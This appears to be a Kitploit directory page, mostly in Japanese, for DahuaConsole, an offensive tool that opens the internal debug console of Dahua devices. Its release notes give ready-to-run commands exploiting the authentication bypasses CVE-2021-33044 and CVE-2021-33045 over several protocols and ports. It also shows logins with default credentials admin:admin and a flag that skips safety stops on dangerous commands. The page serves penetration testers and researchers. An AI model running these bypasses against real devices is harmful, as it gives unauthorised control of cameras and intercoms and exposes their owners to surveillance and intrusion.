Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
DahuaConsole — Dahua Console は、Dahua デバイスの内部デバッグコンソールや、その他の調査済み機能にアクセスします。このプロジェクトへの貢献は大歓迎です。 | Kitploit
ツール/GitHubGitHub/mcw0/dahuaconsole
認証と認可組み込みシステムセキュリティ偵察IoTセキュリティ脆弱性分析エクスプロイト情報収集ペネトレーションテスト
GitHubmcw0/dahuaconsole

DahuaConsole

Dahua Console は、Dahua デバイスの内部デバッグコンソールや、その他の調査済み機能にアクセスします。このプロジェクトへの貢献は大歓迎です。

リポジトリを見る
31679261年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Dahua Console

  • バージョン: プレアルファ
  • バグ: その通り
  • TODO: やることがたくさん

[インストール要件]

sudo pip3 install -r requirements.txt

[引数]

  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://<username>:<password>@<host>:<port>
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

[リリース]

[更新] 2022-07-10

  • 2016年製V2ソフトウェアを実行しているVTH1510CH向けに3des_oldログオン方式を追加
    • ログインパケットデータに小さな違いがあります
    • 接続時にデバイスパラメータを問い合わせないでください - 接続がリセットされます
  • --restore config-file.json を追加
    • json設定ファイルまたはその一部を読み込みます。

例:

./Console.py --rhost 192.168.1.x --proto 3des --auth admin:admin --logon old_3des --dump config

[更新]

2021-10-07

詳細はこちら: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

必要なプロトコル: DHIP または HTTP/HTTPS (DHIP は TLS/SSL @TCP/443 では動作しません)

[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

必要なプロトコル: DHIP (DHIP は TLS/SSL @TCP/443 では動作しません)

[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80

ツールをダウンロード